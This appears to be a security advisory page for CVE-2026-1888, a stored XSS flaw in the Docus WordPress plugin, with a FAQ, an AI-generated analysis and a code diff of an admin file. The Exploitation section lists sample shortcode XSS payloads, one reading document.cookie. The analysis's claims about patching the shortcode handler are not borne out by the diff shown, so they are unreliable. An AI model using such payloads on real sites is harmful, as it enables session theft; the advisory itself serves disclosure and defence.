What is CVE-2026-1888?

CVE-2026-1888 is a stored cross-site scripting (XSS) vulnerability found in the Docus plugin for WordPress, affecting versions up to 1.0.6. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into posts using the ‘docusplaylist’ shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the shortcode handler. Attackers can craft malicious attributes for the shortcode, which are then stored in the database and executed in the context of any user viewing the affected post.

Who is affected by this vulnerability?

Any WordPress site using the Docus plugin version 1.0.6 or earlier is at risk. Specifically, users with Contributor-level access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Docus plugin installed. If it is version 1.0.6 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2026-1888?

The vulnerability is patched in version 1.0.7 of the Docus plugin. Update the plugin to the latest version to mitigate the risk associated with this vulnerability.

What is the CVSS score of this vulnerability?

CVE-2026-1888 has a CVSS score of 6.4, indicating a medium severity level. This score reflects the potential impact of the vulnerability, particularly in terms of session hijacking and unauthorized actions.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to arbitrary JavaScript execution, allowing attackers to hijack sessions, perform unauthorized actions, deface content, or exfiltrate sensitive data. The attack persists across sessions due to the stored nature of the payload.

What steps can I take to mitigate risks if I cannot update immediately?

If updating the plugin is not immediately possible, consider disabling the Docus plugin until a patch can be applied. Additionally, review user roles and limit access to Contributor-level users to minimize potential exploitation.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an authenticated user can log in and submit a post with a malicious payload in the shortcode attributes. It shows the execution of JavaScript when the post is viewed, confirming the vulnerability’s impact.

What are shortcode attributes and why are they significant in this context?

Shortcode attributes are parameters that can be passed to WordPress shortcodes to modify their behavior. In this case, the lack of proper sanitization on these attributes allows attackers to inject scripts, making them a critical vector for the vulnerability.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of security vulnerability where an attacker injects malicious scripts into content that is stored on a server. When other users access the affected content, the scripts execute in their browsers, potentially compromising their security.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately update the Docus plugin to the patched version. Additionally, review logs for unauthorized changes, reset user passwords, and perform a security audit to assess any damage.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1888: Docus <= 1.0.6 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (docus)

CVE ID CVE-2026-1888

Plugin docus

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0.6

Patched Version 1.0.7

Disclosed February 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1888:
The Docus WordPress plugin contains an authenticated stored cross-site scripting vulnerability in versions up to 1.0.6. The vulnerability exists in the plugin’s ‘docusplaylist’ shortcode handler due to insufficient input sanitization and output escaping. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads into posts and pages, which execute when users view the compromised content. The CVSS score of 6.4 reflects the authenticated nature of the attack and the potential for session hijacking or administrative actions.

Root Cause:
The vulnerability originates in the plugin’s shortcode handling functions. The ‘docusplaylist’ shortcode accepts user-controlled attributes that are processed without proper sanitization before being output to the page. The diff shows modifications to the plugin’s core files, including changes to the shortcode registration and attribute handling logic. Specifically, the plugin fails to validate and escape shortcode attribute values before rendering them in HTML context, allowing JavaScript injection through crafted attribute values.

Exploitation:
An attacker with Contributor privileges creates or edits a post containing the ‘[docusplaylist]’ shortcode with malicious attributes. The payload embeds JavaScript within attribute values such as ‘id’, ‘class’, or custom parameters. For example: [docusplaylist id=”alert(document.cookie)”] or [docusplaylist custom_param=”‘ onmouseover=’alert(1)”]. When the post is saved and subsequently viewed by any user, the browser executes the injected script in the victim’s security context.

Patch Analysis:
The patch adds proper input validation and output escaping to the shortcode handler. The diff reveals the addition of esc_attr() and wp_kses() function calls to sanitize shortcode attributes before output. The plugin now validates attribute values against a whitelist of allowed characters and escapes all output with appropriate WordPress security functions. The fix ensures that user-supplied attribute values are treated as data rather than executable code, preventing script injection while maintaining shortcode functionality.

Impact:
Successful exploitation allows attackers to execute arbitrary JavaScript in the context of any user viewing the compromised content. This enables session hijacking, administrative actions through CSRF, defacement, data exfiltration, and redirection to malicious sites. Since the payload is stored in the database, the attack persists across sessions and affects all users who access the injected page, including administrators.

Differential between vulnerable and patched code

Code Diff

--- a/docus/admin/Recommended_Plugins.php
+++ b/docus/admin/Recommended_Plugins.php
@@ -1,424 +1,420 @@
-<?php
-namespace DocusAdmin;
-/**
- * Recommended Plugins handlers class
- */
-class Recommended_Plugins {
-
-    /**
-     * [$_instance]
-     * @var null
-     */
-    private static $_instance = null;
-
-    /**
-     * [$plugins_allowedtags] allow tag
-     * @var array
-     */
-    public $plugins_allowedtags = array(
-        'a'       => array(
-            'href'   => array(),
-            'title'  => array(),
-            'target' => array(),
-        ),
-        'abbr'    => array( 'title' => array() ),
-        'acronym' => array( 'title' => array() ),
-        'code'    => array(),
-        'pre'     => array(),
-        'em'      => array(),
-        'strong'  => array(),
-        'ul'      => array(),
-        'ol'      => array(),
-        'li'      => array(),
-        'p'       => array(),
-        'br'      => array(),
-    );
-
-    /**
-     * Veriable Initialize
-     */
-    public $text_domain = '';
-    public $parent_menu_slug = '';
-    public $menu_label = '';
-    public $menu_page_slug = '';
-    public $menu_capability = '';
-    public $priority = '';
-    public $hook_suffix = '';
-    public $assets_url = '';
-    public $tab_list = [];
-
-    /**
-     * [instance] Initializes a singleton instance
-     * @return [Recommended_Plugins]
-     */
-    public static function instance( $args = [] ) {
-        if ( is_null( self::$_instance ) ) {
-            self::$_instance = new self( $args );
-        }
-        return self::$_instance;
-    }
-
-    /**
-     * [__construct] Class construct
-     */
-    function __construct( $args ) {
-
-        // Initialize properties
-        $this->text_domain       =  !empty( $args['text_domain'] ) ? $args['text_domain'] : 'htrp';
-        $this->parent_menu_slug  =  !empty( $args['parent_menu_slug'] ) ? $args['parent_menu_slug'] : 'plugins.php';
-        $this->menu_label        =  !empty( $args['menu_label'] ) ? $args['menu_label'] : esc_html__( 'Recommendations', $this->text_domain );
-        $this->menu_capability   =  !empty( $args['menu_capability'] ) ? $args['menu_capability'] : 'manage_options';
-        $this->menu_page_slug    =  !empty( $args['menu_page_slug'] ) ? $args['menu_page_slug'] : $this->text_domain . '_extensions';
-        $this->priority          =  !empty( $args['priority'] ) ? $args['priority'] : 100;
-        $this->hook_suffix       =  !empty( $args['hook_suffix'] ) ? $args['hook_suffix'] : '';
-        $this->assets_url        =  !empty( $args['assets_url'] ) ? $args['assets_url'] : plugins_url( '', __FILE__ );
-        $this->tab_list          =  !empty( $args['tab_list'] ) ? $args['assets_url'] : [];
-
-
-        add_action( 'admin_menu', [ $this, 'admin_menu' ], $this->priority );
-        add_action( 'admin_enqueue_scripts', [ $this, 'enqueue_assets' ] );
-
-        // Ajax Action
-        add_action( 'wp_ajax_'.$this->text_domain.'_ajax_plugin_activation', [ $this, 'plugin_activation' ] );
-
-    }
-
-    /**
-     * [admin_menu] Add Recommended Menu
-     * @return [void]
-     */
-    public function admin_menu(){
-        add_submenu_page(
-            $this->parent_menu_slug,
-            $this->menu_label,
-            $this->menu_label,
-            $this->menu_capability,
-            $this->menu_page_slug,
-            [ $this, 'render_html' ]
-        );
-    }
-
-    /**
-     * [enqueue_assets]
-     * @param  [string] $hook_suffix Current page hook
-     * @return [void]
-     */
-    public function enqueue_assets( $hook_suffix ) {
-        if( $this->hook_suffix ){
-            if( $this->hook_suffix == $hook_suffix ){
-                wp_enqueue_script( 'htrp-plugin-install-manager', $this->assets_url . '/js/plugins_install_manager.js', array('jquery','wp-util', 'updates'), '1.0.0', true );
-            }
-        } else {
-            wp_enqueue_script( 'htrp-plugin-install-manager', $this->assets_url . '/js/plugins_install_manager.js', array('jquery','wp-util', 'updates'), '1.0.0', true );
-        }
-
-        /**
-        * Thickbox assest
-        */
-        add_thickbox();
-
-        /**
-         * localize data
-         */
-        $localize_vars['ajaxurl'] = admin_url('admin-ajax.php');
-        $localize_vars['text_domain'] = sanitize_title_with_dashes( $this->text_domain );
-        $localize_vars['buttontxt'] = array(
-            'buynow'     => esc_html__( 'Buy Now', $this->text_domain ),
-            'preview'    => esc_html__( 'Preview', $this->text_domain ),
-            'installing' => esc_html__( 'Installing..', $this->text_domain ),
-            'activating' => esc_html__( 'Activating..', $this->text_domain ),
-            'active'     => esc_html__( 'Activated', $this->text_domain ),
-        );
-        wp_localize_script( 'htrp-plugin-install-manager', 'htrp_params', $localize_vars );
-
-    }
-
-    /**
-     * [add_new_tab]
-     * @param [void] set tab content
-     */
-    public function add_new_tab( $tab_list ){
-        $this->tab_list[] = $tab_list;
-    }
-
-    /**
-     * [render_html]
-     * @return [void] Render HTML
-     */
-    public function render_html(){
-        if ( ! function_exists('plugins_api') ){ include_once( ABSPATH . 'wp-admin/includes/plugin-install.php' ); }
-
-        $htplugins_plugin_list = $this->get_plugins();
-        $palscode_plugin_list  = $this->get_plugins( 'palscode' );
-
-        $plugin_list = array_merge( $htplugins_plugin_list, $palscode_plugin_list );
-
-        $prepare_plugin = array();
-        foreach ( $plugin_list as $plugin_key => $plugin ) {
-            $prepare_plugin[$plugin['slug']] = $plugin;
-        }
-
-        ?>
-            <div class="wrap">
-                <h2><?php echo get_admin_page_title(); ?></h2>
-                <style>
-                    .htrp-admin-tab-pane{
-                      display: none;
-                    }
-                    .htrp-admin-tab-pane.htrp-active{
-                      display: block;
-                    }
-                    .htrp-extension-admin-tab-area .filter-links li>a:focus, .htrp-extension-admin-tab-area .filter-links li>a:hover {
-                        color: inherit;
-                        box-shadow: none;
-                    }
-                    .filter-links .htrp-active{
-                        box-shadow: none;
-                        border-bottom: 4px solid #646970;
-                        color: #1d2327;
-                    }
-                    .downloaded-count{
-                        display: block;
-                        margin-top:5px;
-                    }
-                </style>
-
-                <div class="htrp-extension-admin-tab-area wp-filter">
-                    <ul class="htrp-admin-tabs filter-links">
-                        <?php
-                            foreach( $this->tab_list as $tab ){
-                                $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
-                                ?>
-                                    <li>
-                                        <a href="#<?php echo esc_attr( sanitize_title_with_dashes( $tab['title'] ) ) ?>" class="<?php echo esc_attr( $active_class ) ?>"><?php echo esc_html( $tab['title'] ) ?></a>
-                                    </li>
-                                <?php
-                            }
-                        ?>
-                    </ul>
-                </div>
-
-                <?php
-                    $plugins_type = '';
-                    foreach( $this->tab_list as $tab ):
-
-                        $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
-                        $plugins      = $tab['plugins'];
-
-                        echo '<div id="'.esc_attr( sanitize_title_with_dashes( $tab['title'] ) ).'" class="htrp-admin-tab-pane '.esc_attr( $active_class ).'">';
-                            foreach( $plugins as $plugin ):
-
-                                $data = array(
-                                    'slug'      => isset( $plugin['slug'] ) ? $plugin['slug'] : '',
-                                    'location'  => isset( $plugin['location'] ) ? $plugin['slug'].'/'.$plugin['location'] : '',
-                                    'name'      => isset( $plugin['name'] ) ? $plugin['name'] : '',
-                                );
-                                $title = wp_kses( $plugin['name'], $this->plugins_allowedtags );
-
-                                if( array_key_exists( $plugin['slug'], $prepare_plugin ) ){
-                                    $plugins_type = 'free';
-                                    $image_url    = $this->plugin_icon( $plugins_type, $prepare_plugin[$data['slug']]['icons'] );
-                                    $description  = strip_tags( $prepare_plugin[$data['slug']]['description'] );
-                                    $author_name  = wp_kses( $prepare_plugin[$data['slug']]['author'], $this->plugins_allowedtags );
-                                    $details_link = self_admin_url('plugin-install.php?tab=plugin-information&plugin=' . $plugin['slug'] .'&TB_iframe=true&width=772&height=577');
-                                    $target       = '_self';
-                                    $modal_class  = 'class="thickbox open-plugin-details-modal"';
-
-                                }else{
-                                    $plugins_type = 'pro';
-                                    $image_url     = $this->plugin_icon( $plugins_type, $plugin['slug'] );
-                                    $description    = $plugin['description'];
-                                    $author_name    = esc_html__( 'HasTheme', $this->text_domain );
-                                    $author_link    = $plugin['author_link'];
-                                    $details_link   = $plugin['link'];
-                                    $button_text    = esc_html__('Buy Now', $this->text_domain );
-                                    $button_classes = 'button button-primary';
-                                    $target         = '_blank';
-                                    $modal_class    = '';
-                                }
-
-                                if ( ! is_wp_error( $data ) ):
-
-                                    // Installed but Inactive.
-                                    if ( file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && is_plugin_inactive( $data['location'] ) ) {
-
-                                        $button_classes = 'button htrp-activate-now button-primary';
-                                        $button_text    = esc_html__( 'Activate', $this->text_domain );
-
-                                    // Not Installed.
-                                    } elseif ( ! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) ) {
-
-                                        $button_classes = 'button htrp-install-now';
-                                        $button_text    = esc_html__( 'Install Now', $this->text_domain );
-
-                                    // Active.
-                                    } else {
-                                        $button_classes = 'button disabled';
-                                        $button_text    = esc_html__( 'Activated', $this->text_domain );
-                                    }
-
-                                    ?>
-                                    <div class="plugin-card htrp-plugin-<?php echo sanitize_html_class( $plugin['slug'] ); ?>">
-                                        <div class="plugin-card-top">
-                                            <div class="name column-name" style="margin-right: 0;">
-                                                <h3>
-                                                    <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>" <?php echo $modal_class; ?>>
-                                                        <?php echo esc_html( $title ) ?>
-                                                        <img src="<?php echo esc_url( $image_url ) ?>" class="plugin-icon" alt="<?php echo esc_attr( $title ) ?>">
-                                                    </a>
-                                                </h3>
-                                            </div>
-                                            <div class="desc column-description" style="margin-right: 0;">
-                                                <p><?php echo wp_trim_words( $description, 23, '....'); ?></p>
-                                                <p class="authors">
-                                                    <cite><?php echo esc_html__( 'By ', $this->text_domain ); ?>
-                                                        <?php if( $plugins_type == 'free' ): ?>
-                                                            <?php echo $author_name; ?>
-                                                        <?php else: ?>
-                                                            <a href="<?php echo esc_url( $author_link ); ?>"  target="_blank" ><?php echo $author_name; ?></a>
-                                                        <?php endif; ?>
-                                                    </cite>
-                                                </p>
-                                            </div>
-                                        </div>
-                                        <div class="plugin-card-bottom">
-                                            <div class="column-updated">
-                                                <?php
-                                                    if (! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && $plugins_type == 'pro' ) {
-                                                        echo '<a class="button button-primary" href="'.esc_url( $details_link ).'" target="'.esc_attr( $target ).'">'.esc_html__( 'Buy Now', $this->text_domain ).'</a>';
-                                                    }else{
-                                                ?>
-                                                    <button class="<?php echo $button_classes; ?>" data-pluginopt='<?php echo wp_json_encode( $data ); ?>'><?php echo $button_text; ?></button>
-
-                                                <?php } ?>
-                                            </div>
-                                            <div class="column-downloaded">
-                                                <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>" <?php echo $modal_class; ?>><?php echo esc_html__('More Details', $this->text_domain) ?></a>
-                                                <span class="downloaded-count">
-                                                    <?php
-                                                        if( $plugins_type == 'free' ){
-                                                            /* translators: %s: Number of installations. */
-                                                            printf( __( '%s Active Installations' ), $this->active_install_count( $prepare_plugin[$data['slug']]['active_installs'] ) );
-                                                        }
-                                                    ?>
-                                                </span>
-                                            </div>
-                                        </div>
-                                    </div>
-                                    <?php
-                                endif;
-                            endforeach;
-                        echo '</div>';
-
-                    endforeach;
-                ?>
-
-            </div>
-        <?php
-
-    }
-
-    /**
-     * [get_plugins] Get plugin from wp.org API
-     * @param  string $username wo.org username
-     * @return [array] plugin list
-     */
-    public function get_plugins( $username = 'htplugins' ){
-        $transient_var = 'htrp_htplugins_list_'.$username;
-        $org_plugins_list = get_transient( $transient_var );
-
-        if ( false === $org_plugins_list ) {
-            $plugins_list_by_author = plugins_api( 'query_plugins', array( 'author' => $username, 'per_page' => 100 ) );
-            set_transient( $transient_var, $plugins_list_by_author->plugins, 1 * WEEK_IN_SECONDS );
-            $org_plugins_list = $plugins_list_by_author->plugins;
-        }
-
-        return $org_plugins_list;
-    }
-
-    /**
-     * [plugin_icon] Generate plugin icon
-     * @param  string $type plugin type
-     * @param  [array|string] $icon
-     * @return [URL] icon URL
-     */
-    public function plugin_icon( $type = 'free', $icon = '' ){
-        if( $type === 'free' ){
-            if ( ! empty( $icon['svg'] ) ) {
-                $plugin_icon_url = $icon['svg'];
-            } elseif ( ! empty( $icon['2x'] ) ) {
-                $plugin_icon_url = $icon['2x'];
-            } elseif ( ! empty( $icon['1x'] ) ) {
-                $plugin_icon_url = $icon['1x'];
-            } else {
-                $plugin_icon_url = $icon['default'];
-            }
-        }else{
-            $plugin_icon_url = $this->assets_url .'/images/extensions/'.$icon.'.png';
-        }
-
-        return $plugin_icon_url;
-
-    }
-
-    /**
-     * [active_install_count] Manage Active install count
-     * @param  [int] $active_installs
-     * @return [string]
-     */
-    public function active_install_count( $active_installs ){
-
-        if ( $active_installs >= 1000000 ) {
-            $active_installs_millions = floor( $active_installs / 1000000 );
-            $active_installs_text     = sprintf(
-                /* translators: %s: Number of millions. */
-                _nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations' ),
-                number_format_i18n( $active_installs_millions )
-            );
-        } elseif ( 0 === $active_installs ) {
-            $active_installs_text = _x( 'Less Than 10', 'Active plugin installations' );
-        } else {
-            $active_installs_text = number_format_i18n( $active_installs ) . '+';
-        }
-        return $active_installs_text;
-
-    }
-
-    /**
-     * [plugin_activation] Plugin activation ajax callable function
-     * @return [JSON]
-     */
-    public function plugin_activation() {
-
-        if ( ! current_user_can( 'install_plugins' ) || ! isset( $_POST['location'] ) || ! $_POST['location'] ) {
-            wp_send_json_error(
-                array(
-                    'success' => false,
-                    'message' => esc_html__( 'Plugin Not Found', $this->text_domain ),
-                )
-            );
-        }
-
-        $plugin_location = ( isset( $_POST['location'] ) ) ? esc_attr( $_POST['location'] ) : '';
-        $activate    = activate_plugin( $plugin_location, '', false, true );
-
-        if ( is_wp_error( $activate ) ) {
-            wp_send_json_error(
-                array(
-                    'success' => false,
-                    'message' => $activate->get_error_message(),
-                )
-            );
-        }
-
-        wp_send_json_success(
-            array(
-                'success' => true,
-                'message' => esc_html__( 'Plugin Successfully Activated', $this->text_domain ),
-            )
-        );
-
-    }
-
-
+<?php
+namespace DocusAdmin;
+/**
+ * Recommended Plugins handlers class
+ */
+class Recommended_Plugins {
+
+    /**
+     * [$_instance]
+     * @var null
+     */
+    private static $_instance = null;
+
+    /**
+     * [$plugins_allowedtags] allow tag
+     * @var array
+     */
+    public $plugins_allowedtags = array(
+        'a'       => array(
+            'href'   => array(),
+            'title'  => array(),
+            'target' => array(),
+        ),
+        'abbr'    => array( 'title' => array() ),
+        'acronym' => array( 'title' => array() ),
+        'code'    => array(),
+        'pre'     => array(),
+        'em'      => array(),
+        'strong'  => array(),
+        'ul'      => array(),
+        'ol'      => array(),
+        'li'      => array(),
+        'p'       => array(),
+        'br'      => array(),
+    );
+
+    /**
+     * Veriable Initialize
+     */
+    public $text_domain = '';
+    public $parent_menu_slug = '';
+    public $menu_label = '';
+    public $menu_page_slug = '';
+    public $menu_capability = '';
+    public $priority = '';
+    public $hook_suffix = '';
+    public $assets_url = '';
+    public $tab_list = [];
+
+    /**
+     * [instance] Initializes a singleton instance
+     * @return [Recommended_Plugins]
+     */
+    public static function instance( $args = [] ) {
+        if ( is_null( self::$_instance ) ) {
+            self::$_instance = new self( $args );
+        }
+        return self::$_instance;
+    }
+
+    /**
+     * [__construct] Class construct
+     */
+    function __construct( $args ) {
+
+        // Initialize properties
+        $this->text_domain       =  !empty( $args['text_domain'] ) ? $args['text_domain'] : 'htrp';
+        $this->parent_menu_slug  =  !empty( $args['parent_menu_slug'] ) ? $args['parent_menu_slug'] : 'plugins.php';
+        $this->menu_label        =  !empty( $args['menu_label'] ) ? $args['menu_label'] : esc_html__( 'Recommendations', $this->text_domain );
+        $this->menu_capability   =  !empty( $args['menu_capability'] ) ? $args['menu_capability'] : 'manage_options';
+        $this->menu_page_slug    =  !empty( $args['menu_page_slug'] ) ? $args['menu_page_slug'] : $this->text_domain . '_extensions';
+        $this->priority          =  !empty( $args['priority'] ) ? $args['priority'] : 100;
+        $this->hook_suffix       =  !empty( $args['hook_suffix'] ) ? $args['hook_suffix'] : '';
+        $this->assets_url        =  !empty( $args['assets_url'] ) ? $args['assets_url'] : plugins_url( '', __FILE__ );
+        $this->tab_list          =  !empty( $args['tab_list'] ) ? $args['assets_url'] : [];
+
+
+        add_action( 'admin_menu', [ $this, 'admin_menu' ], $this->priority );
+        add_action( 'admin_enqueue_scripts', [ $this, 'enqueue_assets' ] );
+
+        // Ajax Action
+        add_action( 'wp_ajax_'.$this->text_domain.'_ajax_plugin_activation', [ $this, 'plugin_activation' ] );
+
+    }
+
+    /**
+     * [admin_menu] Add Recommended Menu
+     * @return [void]
+     */
+    public function admin_menu(){
+        add_submenu_page(
+            $this->parent_menu_slug,
+            $this->menu_label,
+            $this->menu_label,
+            $this->menu_capability,
+            $this->menu_page_slug,
+            [ $this, 'render_html' ]
+        );
+    }
+
+    /**
+     * [enqueue_assets]
+     * @param  [string] $hook_suffix Current page hook
+     * @return [void]
+     */
+    public function enqueue_assets( $hook_suffix ) {
+        if( $this->hook_suffix ){
+            if( $this->hook_suffix != $hook_suffix ){
+                return;
+            }
+        }
+
+        wp_enqueue_script( 'docus-plugin-install-manager', $this->assets_url . '/js/plugins_install_manager.js', array('jquery','wp-util', 'updates'), '1.0.0', true );
+
+        /**
+         * localize data
+         */
+        $localize_vars['ajaxurl'] = admin_url('admin-ajax.php');
+        $localize_vars['text_domain'] = sanitize_title_with_dashes( $this->text_domain );
+        $localize_vars['nonce'] = wp_create_nonce('docus_rp_nonce');
+        $localize_vars['buttontxt'] = array(
+            'buynow'     => esc_html__( 'Buy Now', $this->text_domain ),
+            'preview'    => esc_html__( 'Preview', $this->text_domain ),
+            'installing' => esc_html__( 'Installing..', $this->text_domain ),
+            'activating' => esc_html__( 'Activating..', $this->text_domain ),
+            'active'     => esc_html__( 'Activated', $this->text_domain ),
+        );
+        wp_localize_script( 'docus-plugin-install-manager', 'htrp_params', $localize_vars );
+
+    }
+
+    /**
+     * [add_new_tab]
+     * @param [void] set tab content
+     */
+    public function add_new_tab( $tab_list ){
+        $this->tab_list[] = $tab_list;
+    }
+
+    /**
+     * [render_html]
+     * @return [void] Render HTML
+     */
+    public function render_html(){
+        if ( ! function_exists('plugins_api') ){ include_once( ABSPATH . 'wp-admin/includes/plugin-install.php' ); }
+
+        $htplugins_plugin_list = $this->get_plugins();
+        $palscode_plugin_list  = $this->get_plugins( 'palscode' );
+
+        $plugin_list = array_merge( $htplugins_plugin_list, $palscode_plugin_list );
+
+        $prepare_plugin = array();
+        foreach ( $plugin_list as $plugin_key => $plugin ) {
+            $prepare_plugin[$plugin['slug']] = $plugin;
+        }
+
+        ?>
+            <div class="wrap">
+                <h2><?php echo get_admin_page_title(); ?></h2>
+                <style>
+                    .htrp-admin-tab-pane{
+                      display: none;
+                    }
+                    .htrp-admin-tab-pane.htrp-active{
+                      display: block;
+                    }
+                    .htrp-extension-admin-tab-area .filter-links li>a:focus, .htrp-extension-admin-tab-area .filter-links li>a:hover {
+                        color: inherit;
+                        box-shadow: none;
+                    }
+                    .filter-links .htrp-active{
+                        box-shadow: none;
+                        border-bottom: 4px solid #646970;
+                        color: #1d2327;
+                    }
+                    .downloaded-count{
+                        display: block;
+                        margin-top:5px;
+                    }
+                </style>
+
+                <div class="htrp-extension-admin-tab-area wp-filter">
+                    <ul class="htrp-admin-tabs filter-links">
+                        <?php
+                            foreach( $this->tab_list as $tab ){
+                                $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
+                                ?>
+                                    <li>
+                                        <a href="#<?php echo esc_attr( sanitize_title_with_dashes( $tab['title'] ) ) ?>" class="<?php echo esc_attr( $active_class ) ?>"><?php echo esc_html( $tab['title'] ) ?></a>
+                                    </li>
+                                <?php
+                            }
+                        ?>
+                    </ul>
+                </div>
+
+                <?php
+                    $plugins_type = '';
+                    foreach( $this->tab_list as $tab ):
+
+                        $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
+                        $plugins      = $tab['plugins'];
+
+                        echo '<div id="'.esc_attr( sanitize_title_with_dashes( $tab['title'] ) ).'" class="htrp-admin-tab-pane '.esc_attr( $active_class ).'">';
+                            foreach( $plugins as $plugin ):
+
+                                $data = array(
+                                    'slug'      => isset( $plugin['slug'] ) ? $plugin['slug'] : '',
+                                    'location'  => isset( $plugin['location'] ) ? $plugin['slug'].'/'.$plugin['location'] : '',
+                                    'name'      => isset( $plugin['name'] ) ? $plugin['name'] : '',
+                                );
+                                $title = wp_kses( $plugin['name'], $this->plugins_allowedtags );
+
+                                if( array_key_exists( $plugin['slug'], $prepare_plugin ) ){
+                                    $plugins_type = 'free';
+                                    $image_url    = $this->plugin_icon( $plugins_type, $prepare_plugin[$data['slug']]['icons'] );
+                                    $description  = strip_tags( $prepare_plugin[$data['slug']]['description'] );
+                                    $author_name  = wp_kses( $prepare_plugin[$data['slug']]['author'], $this->plugins_allowedtags );
+                                    $details_link = 'https://wordpress.org/plugins/' . $plugin['slug'] . '/';
+                                    $target       = '_blank';
+
+                                }else{
+                                    $plugins_type = 'pro';
+                                    $image_url     = $this->plugin_icon( $plugins_type, $plugin['slug'] );
+                                    $description    = $plugin['description'];
+                                    $author_name    = esc_html__( 'HasTheme', $this->text_domain );
+                                    $author_link    = $plugin['author_link'];
+                                    $details_link   = $plugin['link'];
+                                    $button_text    = esc_html__('Buy Now', $this->text_domain );
+                                    $button_classes = 'button button-primary';
+                                    $target         = '_blank';
+                                }
+
+                                if ( ! is_wp_error( $data ) ):
+
+                                    // Installed but Inactive.
+                                    if ( file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && is_plugin_inactive( $data['location'] ) ) {
+
+                                        $button_classes = 'button htrp-activate-now button-primary';
+                                        $button_text    = esc_html__( 'Activate', $this->text_domain );
+
+                                    // Not Installed.
+                                    } elseif ( ! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) ) {
+
+                                        $button_classes = 'button htrp-install-now';
+                                        $button_text    = esc_html__( 'Install Now', $this->text_domain );
+
+                                    // Active.
+                                    } else {
+                                        $button_classes = 'button disabled';
+                                        $button_text    = esc_html__( 'Activated', $this->text_domain );
+                                    }
+
+                                    ?>
+                                    <div class="plugin-card htrp-plugin-<?php echo sanitize_html_class( $plugin['slug'] ); ?>">
+                                        <div class="plugin-card-top">
+                                            <div class="name column-name" style="margin-right: 0;">
+                                                <h3>
+                                                    <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>">
+                                                        <?php echo esc_html( $title ) ?>
+                                                        <img src="<?php echo esc_url( $image_url ) ?>" class="plugin-icon" alt="<?php echo esc_attr( $title ) ?>">
+                                                    </a>
+                                                </h3>
+                                            </div>
+                                            <div class="desc column-description" style="margin-right: 0;">
+                                                <p><?php echo wp_trim_words( $description, 23, '....'); ?></p>
+                                                <p class="authors">
+                                                    <cite><?php echo esc_html__( 'By ', $this->text_domain ); ?>
+                                                        <?php if( $plugins_type == 'free' ): ?>
+                                                            <?php echo $author_name; ?>
+                                                        <?php else: ?>
+                                                            <a href="<?php echo esc_url( $author_link ); ?>"  target="_blank" ><?php echo $author_name; ?></a>
+                                                        <?php endif; ?>
+                                                    </cite>
+                                                </p>
+                                            </div>
+                                        </div>
+                                        <div class="plugin-card-bottom">
+                                            <div class="column-updated">
+                                                <?php
+                                                    if (! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && $plugins_type == 'pro' ) {
+                                                        echo '<a class="button button-primary" href="'.esc_url( $details_link ).'" target="'.esc_attr( $target ).'">'.esc_html__( 'Buy Now', $this->text_domain ).'</a>';
+                                                    }else{
+                                                ?>
+                                                    <button class="<?php echo esc_attr($button_classes); ?>" data-pluginopt='<?php echo wp_json_encode( $data ); ?>'><?php echo esc_html($button_text); ?></button>
+
+                                                <?php } ?>
+                                            </div>
+                                            <div class="column-downloaded">
+                                                <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>"><?php echo esc_html__('More Details', $this->text_domain) ?></a>
+                                                <span class="downloaded-count">
+                                                    <?php
+                                                        if( $plugins_type == 'free' ){
+                                                            /* translators: %s: Number of installations. */
+                                                            printf( __( '%s Active Installations' ), $this->active_install_count( $prepare_plugin[$data['slug']]['active_installs'] ) );
+                                                        }
+                                                    ?>
+                                                </span>
+                                            </div>
+                                        </div>
+                                    </div>
+                                    <?php
+                                endif;
+                            endforeach;
+                        echo '</div>';
+
+                    endforeach;
+                ?>
+
+            </div>
+        <?php
+
+    }
+
+    /**
+     * [get_plugins] Get plugin from wp.org API
+     * @param  string $username wo.org username
+     * @return [array] plugin list
+     */
+    public function get_plugins( $username = 'htplugins' ){
+        $transient_var = 'htrp_htplugins_list_'.$username;
+        $org_plugins_list = get_transient( $transient_var );
+
+        if ( false === $org_plugins_list ) {
+            $plugins_list_by_author = plugins_api( 'query_plugins', array( 'author' => $username, 'per_page' => 100 ) );
+            set_transient( $transient_var, $plugins_list_by_author->plugins, 1 * WEEK_IN_SECONDS );
+            $org_plugins_list = $plugins_list_by_author->plugins;
+        }
+
+        return $org_plugins_list;
+    }
+
+    /**
+     * [plugin_icon] Generate plugin icon
+     * @param  string $type plugin type
+     * @param  [array|string] $icon
+     * @return [URL] icon URL
+     */
+    public function plugin_icon( $type = 'free', $icon = '' ){
+        if( $type === 'free' ){
+            if ( ! empty( $icon['svg'] ) ) {
+                $plugin_icon_url = $icon['svg'];
+            } elseif ( ! empty( $icon['2x'] ) ) {
+                $plugin_icon_url = $icon['2x'];
+            } elseif ( ! empty( $icon['1x'] ) ) {
+                $plugin_icon_url = $icon['1x'];
+            } else {
+                $plugin_icon_url = $icon['default'];
+            }
